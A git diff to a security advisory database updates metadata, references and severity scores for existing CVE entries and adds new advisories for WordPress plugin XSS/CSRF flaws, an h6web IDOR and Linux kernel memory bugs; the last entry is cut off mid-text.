diff --git a/advisories/unreviewed/2023/04/GHSA-7p63-jgg6-rgpv/GHSA-7p63-jgg6-rgpv.json b/advisories/unreviewed/2023/04/GHSA-7p63-jgg6-rgpv/GHSA-7p63-jgg6-rgpv.json index 8930e4e0ac8..a171f620e8d 100644 --- a/advisories/unreviewed/2023/04/GHSA-7p63-jgg6-rgpv/GHSA-7p63-jgg6-rgpv.json +++ b/advisories/unreviewed/2023/04/GHSA-7p63-jgg6-rgpv/GHSA-7p63-jgg6-rgpv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7p63-jgg6-rgpv", - "modified": "2023-04-09T03:30:18Z", + "modified": "2025-02-13T15:31:20Z", "published": "2023-04-04T00:30:15Z", "aliases": [ "CVE-2023-1579" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=29988" }, + { + "type": "WEB", + "url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git%3Bh=11d171f1910b508a81d21faa087ad1af573407d8" + }, { "type": "WEB", "url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=11d171f1910b508a81d21faa087ad1af573407d8" diff --git a/advisories/unreviewed/2023/04/GHSA-8pwj-3gh6-824j/GHSA-8pwj-3gh6-824j.json b/advisories/unreviewed/2023/04/GHSA-8pwj-3gh6-824j/GHSA-8pwj-3gh6-824j.json index d51f3971fb0..2ee58dc41f8 100644 --- a/advisories/unreviewed/2023/04/GHSA-8pwj-3gh6-824j/GHSA-8pwj-3gh6-824j.json +++ b/advisories/unreviewed/2023/04/GHSA-8pwj-3gh6-824j/GHSA-8pwj-3gh6-824j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8pwj-3gh6-824j", - "modified": "2023-04-10T21:30:24Z", + "modified": "2025-02-13T15:31:20Z", "published": "2023-04-04T00:30:15Z", "aliases": [ "CVE-2023-0614" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0614" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YXBPYIA4VWNOD437NAHZ3NXKAETLFB5S" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YXBPYIA4VWNOD437NAHZ3NXKAETLFB5S" diff --git a/advisories/unreviewed/2023/04/GHSA-8wg8-w2jr-fhvv/GHSA-8wg8-w2jr-fhvv.json b/advisories/unreviewed/2023/04/GHSA-8wg8-w2jr-fhvv/GHSA-8wg8-w2jr-fhvv.json index 36bf3e4fd63..679c934c050 100644 --- a/advisories/unreviewed/2023/04/GHSA-8wg8-w2jr-fhvv/GHSA-8wg8-w2jr-fhvv.json +++ b/advisories/unreviewed/2023/04/GHSA-8wg8-w2jr-fhvv/GHSA-8wg8-w2jr-fhvv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8wg8-w2jr-fhvv", - "modified": "2023-04-13T18:30:31Z", + "modified": "2025-02-13T15:31:22Z", "published": "2023-04-07T03:30:18Z", "aliases": [ "CVE-2023-24798" diff --git a/advisories/unreviewed/2023/04/GHSA-99gr-p997-vr4g/GHSA-99gr-p997-vr4g.json b/advisories/unreviewed/2023/04/GHSA-99gr-p997-vr4g/GHSA-99gr-p997-vr4g.json index 2d5548fa32e..fc8a8b00b41 100644 --- a/advisories/unreviewed/2023/04/GHSA-99gr-p997-vr4g/GHSA-99gr-p997-vr4g.json +++ b/advisories/unreviewed/2023/04/GHSA-99gr-p997-vr4g/GHSA-99gr-p997-vr4g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-99gr-p997-vr4g", - "modified": "2023-04-12T21:30:20Z", + "modified": "2025-02-13T15:31:21Z", "published": "2023-04-05T21:30:24Z", "aliases": [ "CVE-2023-1582" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1582" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/linux-mm/Yg6ac8WlwtnDH6M0%40kroah.com" + }, { "type": "WEB", "url": "https://lore.kernel.org/linux-mm/Yg6ac8WlwtnDH6M0@kroah.com" diff --git a/advisories/unreviewed/2023/04/GHSA-fm53-c89v-pw28/GHSA-fm53-c89v-pw28.json b/advisories/unreviewed/2023/04/GHSA-fm53-c89v-pw28/GHSA-fm53-c89v-pw28.json index 34a36ae0337..b904855cf46 100644 --- a/advisories/unreviewed/2023/04/GHSA-fm53-c89v-pw28/GHSA-fm53-c89v-pw28.json +++ b/advisories/unreviewed/2023/04/GHSA-fm53-c89v-pw28/GHSA-fm53-c89v-pw28.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fm53-c89v-pw28", - "modified": "2023-04-09T03:30:18Z", + "modified": "2025-02-13T15:31:20Z", "published": "2023-04-04T00:30:15Z", "aliases": [ "CVE-2023-1611" @@ -31,6 +31,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QCM6XO4HSPLGR3DFYWFRIA3GCBIHZR4" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZWECAZ7V7EPSXMINO6Q6KWNKDY2CO6ZW" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5QCM6XO4HSPLGR3DFYWFRIA3GCBIHZR4" @@ -39,6 +47,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZWECAZ7V7EPSXMINO6Q6KWNKDY2CO6ZW" }, + { + "type": "WEB", + "url": "https://lore.kernel.org/linux-btrfs/35b9a70650ea947387cf352914a8774b4f7e8a6f.1679481128.git.fdmanana%40suse.com" + }, { "type": "WEB", "url": "https://lore.kernel.org/linux-btrfs/35b9a70650ea947387cf352914a8774b4f7e8a6f.1679481128.git.fdmanana@suse.com" diff --git a/advisories/unreviewed/2023/04/GHSA-jc3m-fp5q-7qx9/GHSA-jc3m-fp5q-7qx9.json b/advisories/unreviewed/2023/04/GHSA-jc3m-fp5q-7qx9/GHSA-jc3m-fp5q-7qx9.json index f86b9eedc95..da3cf5dd7dc 100644 --- a/advisories/unreviewed/2023/04/GHSA-jc3m-fp5q-7qx9/GHSA-jc3m-fp5q-7qx9.json +++ b/advisories/unreviewed/2023/04/GHSA-jc3m-fp5q-7qx9/GHSA-jc3m-fp5q-7qx9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jc3m-fp5q-7qx9", - "modified": "2023-04-13T18:30:30Z", + "modified": "2025-02-13T15:31:21Z", "published": "2023-04-07T03:30:18Z", "aliases": [ "CVE-2023-24797" diff --git a/advisories/unreviewed/2023/04/GHSA-jwh5-m9vf-pgw4/GHSA-jwh5-m9vf-pgw4.json b/advisories/unreviewed/2023/04/GHSA-jwh5-m9vf-pgw4/GHSA-jwh5-m9vf-pgw4.json index 83e48aa85e4..ca52d44d2b3 100644 --- a/advisories/unreviewed/2023/04/GHSA-jwh5-m9vf-pgw4/GHSA-jwh5-m9vf-pgw4.json +++ b/advisories/unreviewed/2023/04/GHSA-jwh5-m9vf-pgw4/GHSA-jwh5-m9vf-pgw4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jwh5-m9vf-pgw4", - "modified": "2023-04-13T18:30:30Z", + "modified": "2025-02-13T15:31:22Z", "published": "2023-04-07T03:30:18Z", "aliases": [ "CVE-2023-24800" diff --git a/advisories/unreviewed/2023/04/GHSA-v9cf-pxq6-w297/GHSA-v9cf-pxq6-w297.json b/advisories/unreviewed/2023/04/GHSA-v9cf-pxq6-w297/GHSA-v9cf-pxq6-w297.json index 87bf226fbd5..3e26f2cbf30 100644 --- a/advisories/unreviewed/2023/04/GHSA-v9cf-pxq6-w297/GHSA-v9cf-pxq6-w297.json +++ b/advisories/unreviewed/2023/04/GHSA-v9cf-pxq6-w297/GHSA-v9cf-pxq6-w297.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v9cf-pxq6-w297", - "modified": "2023-04-09T03:30:18Z", + "modified": "2025-02-13T15:31:21Z", "published": "2023-04-04T00:30:15Z", "aliases": [ "CVE-2023-0922" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0922" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YXBPYIA4VWNOD437NAHZ3NXKAETLFB5S" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YXBPYIA4VWNOD437NAHZ3NXKAETLFB5S" diff --git a/advisories/unreviewed/2023/04/GHSA-w9gc-4j8x-xhjc/GHSA-w9gc-4j8x-xhjc.json b/advisories/unreviewed/2023/04/GHSA-w9gc-4j8x-xhjc/GHSA-w9gc-4j8x-xhjc.json index 1232cdbfe4f..92e6943f82f 100644 --- a/advisories/unreviewed/2023/04/GHSA-w9gc-4j8x-xhjc/GHSA-w9gc-4j8x-xhjc.json +++ b/advisories/unreviewed/2023/04/GHSA-w9gc-4j8x-xhjc/GHSA-w9gc-4j8x-xhjc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w9gc-4j8x-xhjc", - "modified": "2023-04-13T18:30:31Z", + "modified": "2025-02-13T15:31:22Z", "published": "2023-04-07T03:30:18Z", "aliases": [ "CVE-2023-24799" diff --git a/advisories/unreviewed/2024/12/GHSA-jwxc-5ch3-vxqq/GHSA-jwxc-5ch3-vxqq.json b/advisories/unreviewed/2024/12/GHSA-jwxc-5ch3-vxqq/GHSA-jwxc-5ch3-vxqq.json index 874bed880fb..dee04103087 100644 --- a/advisories/unreviewed/2024/12/GHSA-jwxc-5ch3-vxqq/GHSA-jwxc-5ch3-vxqq.json +++ b/advisories/unreviewed/2024/12/GHSA-jwxc-5ch3-vxqq/GHSA-jwxc-5ch3-vxqq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jwxc-5ch3-vxqq", - "modified": "2024-12-24T06:30:42Z", + "modified": "2025-02-13T15:31:22Z", "published": "2024-12-24T06:30:42Z", "aliases": [ "CVE-2024-12582" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12582" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:1413" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-12582" diff --git a/advisories/unreviewed/2025/01/GHSA-3f5v-6r4g-mx23/GHSA-3f5v-6r4g-mx23.json b/advisories/unreviewed/2025/01/GHSA-3f5v-6r4g-mx23/GHSA-3f5v-6r4g-mx23.json index 37c3b9f7e19..4d641941959 100644 --- a/advisories/unreviewed/2025/01/GHSA-3f5v-6r4g-mx23/GHSA-3f5v-6r4g-mx23.json +++ b/advisories/unreviewed/2025/01/GHSA-3f5v-6r4g-mx23/GHSA-3f5v-6r4g-mx23.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3f5v-6r4g-mx23", - "modified": "2025-01-15T15:31:24Z", + "modified": "2025-02-13T15:31:22Z", "published": "2025-01-15T15:31:24Z", "aliases": [ "CVE-2024-57857" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/siw: Remove direct link to net_device\n\nDo not manage a per device direct link to net_device. Rely\non associated ib_devices net_device management, not doubling\nthe effort locally. A badly managed local link to net_device\nwas causing a 'KASAN: slab-use-after-free' exception during\nsiw_query_port() call.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-01-15T13:15:12Z" diff --git a/advisories/unreviewed/2025/01/GHSA-3h9j-8c2j-4jrj/GHSA-3h9j-8c2j-4jrj.json b/advisories/unreviewed/2025/01/GHSA-3h9j-8c2j-4jrj/GHSA-3h9j-8c2j-4jrj.json index 578588d72d3..2789df42a29 100644 --- a/advisories/unreviewed/2025/01/GHSA-3h9j-8c2j-4jrj/GHSA-3h9j-8c2j-4jrj.json +++ b/advisories/unreviewed/2025/01/GHSA-3h9j-8c2j-4jrj/GHSA-3h9j-8c2j-4jrj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3h9j-8c2j-4jrj", - "modified": "2025-01-15T15:31:24Z", + "modified": "2025-02-13T15:31:22Z", "published": "2025-01-15T15:31:24Z", "aliases": [ "CVE-2024-57795" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Remove the direct link to net_device\n\nThe similar patch in siw is in the link:\nhttps://git.kernel.org/rdma/rdma/c/16b87037b48889\n\nThis problem also occurred in RXE. The following analyze this problem.\nIn the following Call Traces:\n\"\nBUG: KASAN: slab-use-after-free in dev_get_flags+0x188/0x1d0 net/core/dev.c:8782\nRead of size 4 at addr ffff8880554640b0 by task kworker/1:4/5295\n\nCPU: 1 UID: 0 PID: 5295 Comm: kworker/1:4 Not tainted\n6.12.0-rc3-syzkaller-00399-g9197b73fd7bb #0\nHardware name: Google Compute Engine/Google Compute Engine,\nBIOS Google 09/13/2024\nWorkqueue: infiniband ib_cache_event_task\nCall Trace:\n \n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x169/0x550 mm/kasan/report.c:488\n kasan_report+0x143/0x180 mm/kasan/report.c:601\n dev_get_flags+0x188/0x1d0 net/core/dev.c:8782\n rxe_query_port+0x12d/0x260 drivers/infiniband/sw/rxe/rxe_verbs.c:60\n __ib_query_port drivers/infiniband/core/device.c:2111 [inline]\n ib_query_port+0x168/0x7d0 drivers/infiniband/core/device.c:2143\n ib_cache_update+0x1a9/0xb80 drivers/infiniband/core/cache.c:1494\n ib_cache_event_task+0xf3/0x1e0 drivers/infiniband/core/cache.c:1568\n process_one_work kernel/workqueue.c:3229 [inline]\n process_scheduled_works+0xa65/0x1850 kernel/workqueue.c:3310\n worker_thread+0x870/0xd30 kernel/workqueue.c:3391\n kthread+0x2f2/0x390 kernel/kthread.c:389\n ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244\n \n\"\n\n1). In the link [1],\n\n\"\n infiniband syz2: set down\n\"\n\nThis means that on 839.350575, the event ib_cache_event_task was sent andi\nqueued in ib_wq.\n\n2). In the link [1],\n\n\"\n team0 (unregistering): Port device team_slave_0 removed\n\"\n\nIt indicates that before 843.251853, the net device should be freed.\n\n3). In the link [1],\n\n\"\n BUG: KASAN: slab-use-after-free in dev_get_flags+0x188/0x1d0\n\"\n\nThis means that on 850.559070, this slab-use-after-free problem occurred.\n\nIn all, on 839.350575, the event ib_cache_event_task was sent and queued\nin ib_wq,\n\nbefore 843.251853, the net device veth was freed.\n\non 850.559070, this event was executed, and the mentioned freed net device\nwas called. Thus, the above call trace occurred.\n\n[1] https://syzkaller.appspot.com/x/log.txt?x=12e7025f980000", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-01-15T13:15:11Z" diff --git a/advisories/unreviewed/2025/01/GHSA-3qr3-w8jf-gq87/GHSA-3qr3-w8jf-gq87.json b/advisories/unreviewed/2025/01/GHSA-3qr3-w8jf-gq87/GHSA-3qr3-w8jf-gq87.json index 2a4925a38a3..b4e255bc42e 100644 --- a/advisories/unreviewed/2025/01/GHSA-3qr3-w8jf-gq87/GHSA-3qr3-w8jf-gq87.json +++ b/advisories/unreviewed/2025/01/GHSA-3qr3-w8jf-gq87/GHSA-3qr3-w8jf-gq87.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3qr3-w8jf-gq87", - "modified": "2025-01-19T12:31:24Z", + "modified": "2025-02-13T15:31:22Z", "published": "2025-01-19T12:31:24Z", "aliases": [ "CVE-2025-21633" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/sqpoll: zero sqd->thread on tctx errors\n\nSyzkeller reports:\n\nBUG: KASAN: slab-use-after-free in thread_group_cputime+0x409/0x700 kernel/sched/cputime.c:341\nRead of size 8 at addr ffff88803578c510 by task syz.2.3223/27552\n Call Trace:\n \n ...\n kasan_report+0x143/0x180 mm/kasan/report.c:602\n thread_group_cputime+0x409/0x700 kernel/sched/cputime.c:341\n thread_group_cputime_adjusted+0xa6/0x340 kernel/sched/cputime.c:639\n getrusage+0x1000/0x1340 kernel/sys.c:1863\n io_uring_show_fdinfo+0xdfe/0x1770 io_uring/fdinfo.c:197\n seq_show+0x608/0x770 fs/proc/fd.c:68\n ...\n\nThat's due to sqd->task not being cleared properly in cases where\nSQPOLL task tctx setup fails, which can essentially only happen with\nfault injection to insert allocation errors.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-01-19T11:15:08Z" diff --git a/advisories/unreviewed/2025/02/GHSA-2252-vj3q-cf9p/GHSA-2252-vj3q-cf9p.json b/advisories/unreviewed/2025/02/GHSA-2252-vj3q-cf9p/GHSA-2252-vj3q-cf9p.json new file mode 100644 index 00000000000..1c82ab882f8 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-2252-vj3q-cf9p/GHSA-2252-vj3q-cf9p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2252-vj3q-cf9p", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26551" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sureshdsk Bootstrap collapse allows Stored XSS. This issue affects Bootstrap collapse: from n/a through 1.0.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26551" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/bootstrap-collapse/vulnerability/wordpress-bootstrap-collapse-plugin-1-0-4-csrf-to-stored-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-25pf-65p9-qghp/GHSA-25pf-65p9-qghp.json b/advisories/unreviewed/2025/02/GHSA-25pf-65p9-qghp/GHSA-25pf-65p9-qghp.json new file mode 100644 index 00000000000..b1593d523c8 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-25pf-65p9-qghp/GHSA-25pf-65p9-qghp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25pf-65p9-qghp", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-26582" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Blackbam TinyMCE Advanced qTranslate fix editor problems allows Stored XSS. This issue affects TinyMCE Advanced qTranslate fix editor problems: from n/a through 1.0.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26582" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/tinymce-advanced-qtranslate-fix-editor-problems/vulnerability/wordpress-tinymce-advanced-qtranslate-fix-editor-problems-plugin-1-0-0-csrf-to-stored-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-268v-p5rc-rhmv/GHSA-268v-p5rc-rhmv.json b/advisories/unreviewed/2025/02/GHSA-268v-p5rc-rhmv/GHSA-268v-p5rc-rhmv.json new file mode 100644 index 00000000000..41f292de9fd --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-268v-p5rc-rhmv/GHSA-268v-p5rc-rhmv.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-268v-p5rc-rhmv", + "modified": "2025-02-13T15:31:27Z", + "published": "2025-02-13T15:31:27Z", + "aliases": [ + "CVE-2025-21701" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: avoid race between device unregistration and ethnl ops\n\nThe following trace can be seen if a device is being unregistered while\nits number of channels are being modified.\n\n DEBUG_LOCKS_WARN_ON(lock->magic != lock)\n WARNING: CPU: 3 PID: 3754 at kernel/locking/mutex.c:564 __mutex_lock+0xc8a/0x1120\n CPU: 3 UID: 0 PID: 3754 Comm: ethtool Not tainted 6.13.0-rc6+ #771\n RIP: 0010:__mutex_lock+0xc8a/0x1120\n Call Trace:\n \n ethtool_check_max_channel+0x1ea/0x880\n ethnl_set_channels+0x3c3/0xb10\n ethnl_default_set_doit+0x306/0x650\n genl_family_rcv_msg_doit+0x1e3/0x2c0\n genl_rcv_msg+0x432/0x6f0\n netlink_rcv_skb+0x13d/0x3b0\n genl_rcv+0x28/0x40\n netlink_unicast+0x42e/0x720\n netlink_sendmsg+0x765/0xc20\n __sys_sendto+0x3ac/0x420\n __x64_sys_sendto+0xe0/0x1c0\n do_syscall_64+0x95/0x180\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThis is because unregister_netdevice_many_notify might run before the\nrtnl lock section of ethnl operations, eg. set_channels in the above\nexample. In this example the rss lock would be destroyed by the device\nunregistration path before being used again, but in general running\nethnl operations while dismantle has started is not a good idea.\n\nFix this by denying any operation on devices being unregistered. A check\nwas already there in ethnl_ops_begin, but not wide enough.\n\nNote that the same issue cannot be seen on the ioctl version\n(__dev_ethtool) because the device reference is retrieved from within\nthe rtnl lock section there. Once dismantle started, the net device is\nunlisted and no reference will be found.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21701" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/12e070eb6964b341b41677fd260af5a305316a1f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f29127e94ae9fdc7497331003d6860e9551cdf3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4dc880245f9b529fa8f476b5553c799d2848b47b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b382ab9b885cbb665e0e70a727f101c981b4edf3" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T15:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-2mv5-xfc5-j7j6/GHSA-2mv5-xfc5-j7j6.json b/advisories/unreviewed/2025/02/GHSA-2mv5-xfc5-j7j6/GHSA-2mv5-xfc5-j7j6.json new file mode 100644 index 00000000000..c39f85cc08c --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-2mv5-xfc5-j7j6/GHSA-2mv5-xfc5-j7j6.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mv5-xfc5-j7j6", + "modified": "2025-02-13T15:31:26Z", + "published": "2025-02-13T15:31:26Z", + "aliases": [ + "CVE-2025-26549" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in pa1 WP Html Page Sitemap allows Stored XSS. This issue affects WP Html Page Sitemap: from n/a through 2.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26549" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/wp-html-page-sitemap/vulnerability/wordpress-wp-html-page-sitemap-plugin-2-2-csrf-to-stored-cross-site-scripting?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T14:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-3889-h6mq-grhq/GHSA-3889-h6mq-grhq.json b/advisories/unreviewed/2025/02/GHSA-3889-h6mq-grhq/GHSA-3889-h6mq-grhq.json new file mode 100644 index 00000000000..0f15ecbae82 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-3889-h6mq-grhq/GHSA-3889-h6mq-grhq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3889-h6mq-grhq", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-1271" + ], + "details": "Reflected Cross-Site Scripting (XSS) in Anapi Group's h6web. This security flaw could allow an attacker to inject malicious JavaScript code into a URL. When a user accesses that URL, the injected code is executed in their browser, which can result in the theft of sensitive information, identity theft or the execution of unauthorised actions on behalf of the affected user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1271" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-anapi-group-h6web" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-3j4c-6c9j-p6jj/GHSA-3j4c-6c9j-p6jj.json b/advisories/unreviewed/2025/02/GHSA-3j4c-6c9j-p6jj/GHSA-3j4c-6c9j-p6jj.json new file mode 100644 index 00000000000..5b6c77e7dd0 --- /dev/null +++ b/advisories/unreviewed/2025/02/GHSA-3j4c-6c9j-p6jj/GHSA-3j4c-6c9j-p6jj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3j4c-6c9j-p6jj", + "modified": "2025-02-13T15:31:25Z", + "published": "2025-02-13T15:31:25Z", + "aliases": [ + "CVE-2025-1270" + ], + "details": "Insecure direct object reference (IDOR) vulnerability in Anapi Group's h6web, allows an authenticated attacker to access other users' information by making a POST request and modifying the “pkrelated” parameter in the “/h6web/ha_datos_hermano.php” endpoint to refer to another user. In addition, the first request could also allow the attacker to impersonate other users. As a result, all requests made after exploitation of the IDOR vulnerability will be executed with the privileges of the impersonated user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1270" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-anapi-group-h6web" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-02-13T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/02/GHSA-6622-jq7q-2394/GHSA-6622-jq7q-2394.json b/advisories/unreviewed/2025/02/GHSA-6622-jq7q-2394/GHSA-6622-jq7q-2394.json index 48792deb390..4b62bedbe7e 100644 --- a/advisories/unreviewed/2025/02/GHSA-6622-jq7q-2394/GHSA-6622-jq7q-2394.json +++ b/advisories/unreviewed/2025/02/GHSA-6622-jq7q-2394/GHSA-6622-jq7q-2394.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6622-jq7q-2394", - "modified": "2025-02-13T06:31:43Z", + "modified": "2025-02-13T15:31:24Z", "published": "2025-02-13T06:31:43Z", "aliases": [ "CVE-2024-13119" ], "details": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User 